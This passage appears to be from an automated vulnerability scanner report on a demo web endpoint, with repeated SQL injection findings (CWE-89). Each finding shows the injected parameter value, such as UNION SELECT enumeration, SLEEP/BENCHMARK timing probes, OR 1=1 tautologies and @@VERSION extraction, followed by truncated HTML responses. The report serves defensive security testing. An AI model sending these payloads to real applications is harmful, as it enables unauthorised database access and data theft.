src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCgAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #995\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #996\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Valuedemouser@deepfence.io ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('\nA')),4\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #997\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT 1,2,3,4,5,6,7,8-\n-\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]Action Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #998\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioUNION ALL SELECT \n1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #999\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioOR 1=1--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1000\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT 'INJ'||'ECT'||'XXX',2#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1001Scan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT \n1,2,3,4,5,6,7,8,9\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1002\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 19#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1003\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 26--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1004\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/Request GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION SELECT @@VERSION,SLEEP(5),\"'3\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1005\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 5#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/z8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1006\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1007\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified Name ValueParameters demouser@\ndeepfence.ioUNION ALL SELECT \n1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1008\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io\" or \"x\"=\"x\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" 